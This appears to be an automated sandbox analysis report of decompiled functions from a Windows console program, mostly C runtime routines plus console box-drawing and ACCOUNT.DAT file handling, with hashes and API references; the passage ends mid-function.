Opcode ID: f05663cb3c9d792ced724edf9c14fca6ccf7b6ce8aac59d38b86b14c914de088
Instruction ID: 3af1030ae1833064506bd5f2d8e32aa930fa85645348002c6f7c4af2593e6920
Opcode Fuzzy Hash: f05663cb3c9d792ced724edf9c14fca6ccf7b6ce8aac59d38b86b14c914de088
Instruction Fuzzy Hash: E791F1B1D25346CFDB24CF68D8845EDBBB0EF06364B24826ED6A6AB2C1D7349403CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B8E23, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B8E23(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E012BA5A7(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E012C0132(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x12d2f60; // 0x0
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E012C0132(2);
							if(E012C0132(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E012C0132(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E012C00AC(_t35);
					 *((char*)( *((intOrPtr*)(0x12d2f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E012B8EDE(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x012b8e26
0x012b8e2d
0x012b8e36
0x012b8e43
0x012b8e95
0x012b8e95
0x012b8e45
0x012b8e45
0x012b8e4d
0x012b8e5b
0x00000000
0x00000000
0x00000000
0x00000000
0x012b8e63
0x012b8e63
0x012b8e65
0x012b8e77
0x00000000
0x012b8e79
0x012b8e79
0x012b8e89
0x00000000
0x012b8e8b
0x012b8e91
0x012b8e91
0x012b8e89
0x012b8e77
0x012b8e4d
0x012b8e98
0x012b8eb0
0x012b8eb7
0x012b8ec5
0x012b8eb9
0x012b8ec0
0x012b8ec0
0x012b8eca
0x012b8e2f
0x012b8e33
0x012b8e33

APIs

__ioinit.LIBCMT ref: 012B8E26

Part of subcall function 012BA5A7: InitOnceExecuteOnce.KERNEL32(012D229C,012BA5E2,00000000,00000000), ref: 012BA5B5

__get_osfhandle.LIBCMT ref: 012B8E3A
__get_osfhandle.LIBCMT ref: 012B8E65
__get_osfhandle.LIBCMT ref: 012B8E6E
__get_osfhandle.LIBCMT ref: 012B8E7A
CloseHandle.KERNEL32(00000000), ref: 012B8E81
GetLastError.KERNEL32(?,012C41AB,012B2656,?,?,?,?,?,?,?,012B2656,00000000,00000109), ref: 012B8E8B
__free_osfhnd.LIBCMT ref: 012B8E98
__dosmaperr.LIBCMT ref: 012B8EBA

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: b59d7f50651dfb5a22ebea98653f03946e08a9cbc7555d3e86b3723a3f36e38d
Instruction ID: 5a4ccc31b58e9953a4dd256f83aa7b35bb62f4e7a8ba0c4b35beed0eb4674fdd
Opcode Fuzzy Hash: b59d7f50651dfb5a22ebea98653f03946e08a9cbc7555d3e86b3723a3f36e38d
Instruction Fuzzy Hash: 0611E532A712529AD626663CA88C7FEBB4D9F91BB4F15434DFB1C8B1C2EAB4D4418250

Uniqueness

Uniqueness Score: -1.00%

Function 012B3AB0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B3B48

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_fprintf.LIBCMT ref: 012B3DA6

Strings

ACCOUNT.DAT, xrefs: 012B3ABE
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B3B3D
TEMP.DAT, xrefs: 012B3AE2
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B3D9A

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: __fsopen_fprintf_swscanf_vfscanf
String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
API String ID: 1563022539-2055742014
Opcode ID: 464f3e07da33180f7d6408c1e7b89420f66039c6c15c6d3bb64867925b62be2a
Instruction ID: 04070d8658fe7caa6cc0088e16577b2d69cc0565077de1bcf034786b9080b3a0
Opcode Fuzzy Hash: 464f3e07da33180f7d6408c1e7b89420f66039c6c15c6d3bb64867925b62be2a
Instruction Fuzzy Hash: 9B91D472C105599FCB09CFA8D995BEEFBB9FF45300F0486AEE006BA184EA7456858F50

Uniqueness

Uniqueness Score: -1.00%

Function 012B1380, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012B1380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t61;
				intOrPtr _t67;
				void* _t75;
				intOrPtr _t87;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t102 = __esi;
				_t101 = __edi;
				E012B12B0(_a4, _a8);
				_push(0xc9);
				_push("%c");
				E012B715C(_t75, __edi, __esi, __eflags);
				_t104 = _t103 + 8;
				_v8 = _a4 + 1;
				while(1) {
					_t109 = _v8 - _a12 - 1;
					if(_v8 >= _a12 - 1) {
						break;
					}
					E012B12B0(_v8, _a8);
					_push(0xcd);
					_push("%c");
					E012B715C(_t75, _t101, _t102, _t109);
					_t104 = _t104 + 8;
					_v8 = _v8 + 1;
				}
				E012B12B0(_v8, _a8);
				_push(0xbb);
				_push("%c");
				E012B715C(_t75, _t101, _t102, __eflags);
				_t105 = _t104 + 8;
				_v12 = _a8 + 1;
				while(1) {
					__eflags = _v12 - _a16;
					if(__eflags >= 0) {
						break;
					}
					E012B12B0(_a4, _v12);
					_v8 = _a4;
					while(1) {
						__eflags = _v8 - _a12;
						if(_v8 >= _a12) {
							break;
						}
						__eflags = _v8 - _a4;
						if(__eflags == 0) {
							L12:
							E012B12B0(_v8, _v12);
							_push(0xba);
							_push("%c");
							E012B715C(_t75, _t101, _t102, __eflags);
							_t105 = _t105 + 8;
						} else {
							__eflags = _v8 - _a12 - 1;
							if(__eflags == 0) {
								goto L12;
							}
						}
						_t67 = _v8 + 1;
						__eflags = _t67;
						_v8 = _t67;
					}
					_t87 = _v12 + 1;
					__eflags = _t87;
					_v12 = _t87;
				}
				E012B12B0(_a4, _v12);
				_push(0xc8);
				_push("%c");
				E012B715C(_t75, _t101, _t102, __eflags);
				_t106 = _t105 + 8;
				_v8 = _a4 + 1;
				while(1) {
					__eflags = _v8 - _a12 - 1;
					if(__eflags >= 0) {
						break;
					}
					E012B12B0(_v8, _v12);
					_push(0xcd);
					_push("%c");
					E012B715C(_t75, _t101, _t102, __eflags);
					_t106 = _t106 + 8;
					_t61 = _v8 + 1;
					__eflags = _t61;
					_v8 = _t61;
				}
				E012B12B0(_v8, _v12);
				_push(0xbc);
				_push("%c");
				return E012B715C(_t75, _t101, _t102, __eflags);
			}

0x012b1380
0x012b1380
0x012b138e
0x012b1393
0x012b1398
0x012b139d
0x012b13a2
0x012b13ab
0x012b13b9
0x012b13bf
0x012b13c2
0x00000000
0x00000000
0x012b13cc
0x012b13d1
0x012b13d6
0x012b13db
0x012b13e0
0x012b13b6
0x012b13b6
0x012b13ed
0x012b13f2
0x012b13f7
0x012b13fc
0x012b1401
0x012b140a
0x012b1418
0x012b141b
0x012b141e
0x00000000
0x00000000
0x012b1428
0x012b1430
0x012b143e
0x012b1441
0x012b1444
0x00000000
0x00000000
0x012b1449
0x012b144c
0x012b1459
0x012b1461
0x012b1466
0x012b146b
0x012b1470
0x012b1475
0x012b144e
0x012b1454
0x012b1457
0x00000000
0x00000000
0x012b1457
0x012b1438
0x012b1438
0x012b143b
0x012b143b
0x012b1412
0x012b1412
0x012b1415
0x012b1415
0x012b1484
0x012b1489
0x012b148e
0x012b1493
0x012b1498
0x012b14a1
0x012b14af
0x012b14b5
0x012b14b8
0x00000000
0x00000000
0x012b14c2
0x012b14c7
0x012b14cc
0x012b14d1
0x012b14d6
0x012b14a9
0x012b14a9
0x012b14ac
0x012b14ac
0x012b14e3
0x012b14e8
0x012b14ed
0x012b14fd

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B139D
_wprintf.LIBCMT ref: 012B13DB

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B13FC
_wprintf.LIBCMT ref: 012B1470
_wprintf.LIBCMT ref: 012B1493
_wprintf.LIBCMT ref: 012B14D1
_wprintf.LIBCMT ref: 012B14F2

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID:
API String ID: 1778593935-0
Opcode ID: f5253ed91d8be3c5b56e58562d060cff028d119f2f5c526ade907002e9fd1189
Instruction ID: 217e91e0c51ee16fc66b5dcb371fb1b24faa5bbb7e3674281ffc99d11aa19cbd
Opcode Fuzzy Hash: f5253ed91d8be3c5b56e58562d060cff028d119f2f5c526ade907002e9fd1189
Instruction Fuzzy Hash: 2D417671A3020AFBCB04DF94DDD1EEE7776EF55780F108258E905A7380D670AB6097A5

Uniqueness

Uniqueness Score: -1.00%

Function 012BD6D2, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012BD6D2(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E012B75FE(_t3);
				if(E012BBF8E() != 0) {
					_t6 = E012BBFD8(_t5, E012BD468);
					 *0x12d1a40 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E012BC55B(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E012BD748();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E012BC002(_t9,  *0x12d1a40, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E012BD626(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E012BD748();
					return 0;
				}
			}

0x012bd6d2
0x012bd6de
0x012bd6ed
0x012bd6f3
0x012bd6f8
0x012bd6fb
0x00000000
0x012bd6fd
0x012bd70a
0x012bd70e
0x012bd710
0x012bd73f
0x012bd73f
0x012bd744
0x012bd747
0x012bd712
0x012bd720
0x012bd722
0x00000000
0x012bd724
0x012bd724
0x012bd726
0x012bd727
0x012bd72e
0x012bd734
0x012bd738
0x012bd73c
0x012bd73e
0x012bd73e
0x012bd722
0x012bd710
0x012bd6e0
0x012bd6e0
0x012bd6e0
0x012bd6e7
0x012bd6e7

APIs

__init_pointers.LIBCMT ref: 012BD6D2

Part of subcall function 012B75FE: RtlEncodePointer.NTDLL(00000000,?,012BD6D7,012B892B,012CD838,00000014), ref: 012B7601
Part of subcall function 012B75FE: __initp_misc_winsig.LIBCMT ref: 012B7622

__mtinitlocks.LIBCMT ref: 012BD6D7

Part of subcall function 012BBF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012D13D0,00000FA0,?,?,012BD6DC,012B892B,012CD838,00000014), ref: 012BBFAC

__mtterm.LIBCMT ref: 012BD6E0
__calloc_crt.LIBCMT ref: 012BD705
__initptd.LIBCMT ref: 012BD727
GetCurrentThreadId.KERNEL32(012B892B,012CD838,00000014), ref: 012BD72E

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2211675822-0
Opcode ID: c47d874e8cbb53c0c391106f6eab62ffcb736fb0b4d77f4424f7643c3d82f22f
Instruction ID: a0edefe9c0cc84a9f48640ffdd94f976e658a0323b89934c5a0ada7588ce2a8e
Opcode Fuzzy Hash: c47d874e8cbb53c0c391106f6eab62ffcb736fb0b4d77f4424f7643c3d82f22f
Instruction Fuzzy Hash: 53F0F63257A3671FE63836FCBC867E636D4CF613F4B204619F555C60C4EF2090419694

Uniqueness

Uniqueness Score: -1.00%

Function 012BBB6C, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E012BBB6C(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E012BA5A7(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E012B8BB2(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E012B8C70();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E012C11E7(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E012B8C70();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E012C192E(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E012C0343(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									_t25 = _t87 + 1; // 0x1a06
									 *_t92 = _t25;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x12d1390;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x12d2f60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E012C17B4(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E012C0343(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E012B8EFF(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E012B8EFF(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x012bbb70
0x012bbb77
0x012bbb7f
0x012bbb84
0x012bbb8a
0x012bbb8d
0x012bbb8f
0x012bbb92
0x012bbba1
0x012bbba4
0x012bbbbe
0x012bbbc0
0x012bbbc3
0x012bbbd8
0x012bbbde
0x012bbbe1
0x012bbbe4
0x012bbbe7
0x012bbbec
0x012bbbee
0x012bbbf6
0x012bbbf8
0x012bbc06
0x012bbc07
0x012bbc0d
0x012bbc0f
0x00000000
0x00000000
0x012bbbfa
0x012bbbfa
0x012bbc02
0x012bbc04
0x012bbc11
0x012bbc12
0x00000000
0x00000000
0x00000000
0x012bbc04
0x012bbbf8
0x012bbc18
0x012bbc1f
0x012bbc9d
0x012bbc9e
0x012bbc9f
0x012bbca5
0x012bbca6
0x012bbca7
0x012bbcaf
0x00000000
0x012bbc21
0x012bbc21
0x012bbc26
0x012bbc29
0x012bbc2e
0x012bbc31
0x012bbc34
0x012bbc37
0x012bbc39
0x012bbc52
0x012bbc55
0x012bbc72
0x012bbc72
0x012bbc57
0x012bbc57
0x012bbc5a
0x00000000
0x012bbc5c
0x012bbc69
0x012bbc69
0x012bbc5a
0x012bbc77
0x012bbc7b
0x00000000
0x012bbc7d
0x012bbc7d
0x012bbc7f
0x012bbc80
0x012bbc81
0x012bbc87
0x012bbc8c
0x012bbc8f
0x00000000
0x00000000
0x00000000
0x00000000
0x012bbc8f
0x012bbc3b
0x012bbc3b
0x012bbc3c
0x012bbc3d
0x012bbc46
0x012bbc91
0x012bbc94
0x012bbc97
0x012bbcb1
0x012bbcb1
0x012bbcb4
0x012bbcbf
0x012bbcb6
0x012bbcb6
0x012bbcb6
0x012bbcb6
0x012bbcb6
0x00000000
0x012bbcb6
0x012bbcb4
0x012bbc39
0x012bbbc5
0x012bbbc5
0x012bbbc8
0x012bbbcb
0x012bbc4d
0x012bbcba
0x012bbcba
0x012bbbcd
0x012bbbd0
0x012bbbd0
0x012bbbd3
0x012bbbd5
0x00000000
0x012bbbd5
0x012bbbcb
0x012bbba6
0x012bbba6
0x012bbbab
0x00000000
0x012bbbab
0x012bbb94
0x012bbb94
0x012bbb99
0x012bbbb1
0x012bbbb1
0x012bbbb5
0x012bbbb5
0x012bbcc7
0x012bbb79
0x012bbb7d
0x012bbb7d

APIs

__ioinit.LIBCMT ref: 012BBB70

Part of subcall function 012BA5A7: InitOnceExecuteOnce.KERNEL32(012D229C,012BA5E2,00000000,00000000), ref: 012BA5B5

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 201f70f30c79320a5f75cfef8394b70177cba330fb7754fac0c4719799dddc18
Instruction ID: 3d6cb0972e02690d3837aaed652ce65ad8eb84f398c29d231d6055ffb9efecf0
Opcode Fuzzy Hash: 201f70f30c79320a5f75cfef8394b70177cba330fb7754fac0c4719799dddc18
Instruction Fuzzy Hash: 7A410371520A069FE734DF2CC8D1ABA7BA4DF453A0B04871DE6AA876D1EB74D4408B50

Uniqueness

Uniqueness Score: -1.00%

Function 012C1D26, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E012C1D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x12d2a68, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x12d2a64 - _t7;
								if(__eflags == 0) {
									_t9 = E012B8EFF(__eflags);
									 *_t9 = E012B8F12(GetLastError());
									goto L17;
								} else {
									__eflags = E012BC6EE(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E012B8EFF(__eflags);
										 *_t12 = E012B8F12(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E012BC6EE(_t6, _t31);
						 *((intOrPtr*)(E012B8EFF(__eflags))) = 0xc;
						goto L12;
					} else {
						E012B8F53(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E012B77C5(__ebx, __edx, __edi, _a8);
				}
			}

0x012c1d2d
0x012c1d3b
0x012c1d3e
0x012c1d40
0x012c1d4f
0x012c1d82
0x012c1d82
0x012c1d85
0x00000000
0x00000000
0x012c1d52
0x012c1d54
0x012c1d56
0x012c1d56
0x012c1d56
0x012c1d63
0x012c1d69
0x012c1d6b
0x012c1d6d
0x012c1dcd
0x012c1dcd
0x012c1d6f
0x012c1d6f
0x012c1d75
0x012c1db7
0x012c1dcb
0x00000000
0x012c1d77
0x012c1d7e
0x012c1d80
0x012c1d9f
0x012c1db3
0x012c1d99
0x012c1d99
0x012c1d99
0x00000000
0x00000000
0x00000000
0x012c1d80
0x012c1d75
0x00000000
0x012c1d9b
0x012c1d88
0x012c1d93
0x00000000
0x012c1d42
0x012c1d45
0x012c1d4b
0x012c1d4b
0x012c1d9c
0x012c1d9e
0x012c1d2f
0x012c1d39
0x012c1d39

APIs

_malloc.LIBCMT ref: 012C1D32

Part of subcall function 012B77C5: __FF_MSGBANNER.LIBCMT ref: 012B77DC
Part of subcall function 012B77C5: __NMSG_WRITE.LIBCMT ref: 012B77E3
Part of subcall function 012B77C5: HeapAlloc.KERNEL32(005A0000,00000000,00000001,00000000,00000000,00000000,?,012BC5BB,00000000,00000000,00000000,00000000,?,012BBF28,00000018,012CD900), ref: 012B7808

_free.LIBCMT ref: 012C1D45

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 067753a6b97b4ac01a301ff6cdea976d1cb7da3884bd3a498502304c6d71871b
Instruction ID: 92a1a733ebc5435c1fe3500c60e08144bd9803363ffaef3c8de704a591a13ec8
Opcode Fuzzy Hash: 067753a6b97b4ac01a301ff6cdea976d1cb7da3884bd3a498502304c6d71871b
Instruction Fuzzy Hash: A311E332524613EFDB313F78A8456F93B99AF10BA0F108629FB0D8A196DF3084A08790

Uniqueness

Uniqueness Score: -1.00%

Function 012B857D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 012B860D

Part of subcall function 012BE840: __87except.LIBCMT ref: 012BE87B

Strings

pow, xrefs: 012B85E5, 012B8602

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0beec0523f2cee48ad4ddb9dc0a4ee7cbc5034f8fc842855de1175fe1129c6ab
Instruction ID: 4a5e4dcb9a2fff850b77782e5d4875981b14477edf92ff5ee905929c81c24c6e
Opcode Fuzzy Hash: 0beec0523f2cee48ad4ddb9dc0a4ee7cbc5034f8fc842855de1175fe1129c6ab
Instruction Fuzzy Hash: 28517A20A38603CAD7267B1CD5C53FA6B98DB407D0F158D69E2DD422EDEB34C4989B46

Uniqueness

Uniqueness Score: -1.00%

Function 012B347B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012B347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t218;
				void* _t228;
				void* _t249;
				void* _t270;
				void* _t283;
				void* _t287;
				void* _t306;
				intOrPtr _t307;
				void* _t309;
				intOrPtr _t310;
				void* _t313;
				void* _t314;
				intOrPtr _t320;
				void* _t336;
				intOrPtr _t364;
				void* _t371;
				intOrPtr _t394;
				void* _t397;
				void* _t421;
				void* _t433;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t450;
				void* _t451;
				void* _t457;

				L0:
				while(1) {
					L0:
					_t457 = __fp0;
					_t421 = __esi;
					_t397 = __edi;
					_t314 = __ebx;
					 *(_t433 - 8) = 1 +  *(_t433 - 8);
					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
					while(1) {
						L69:
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
						if(__eflags < 0) {
						}
						L70:
						E012B12B0(5,  *(_t433 - 0xc) + 0xa);
						_push(1 +  *(_t433 - 8));
						_push("%d.");
						E012B715C(_t314, _t397, _t421, __eflags);
						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
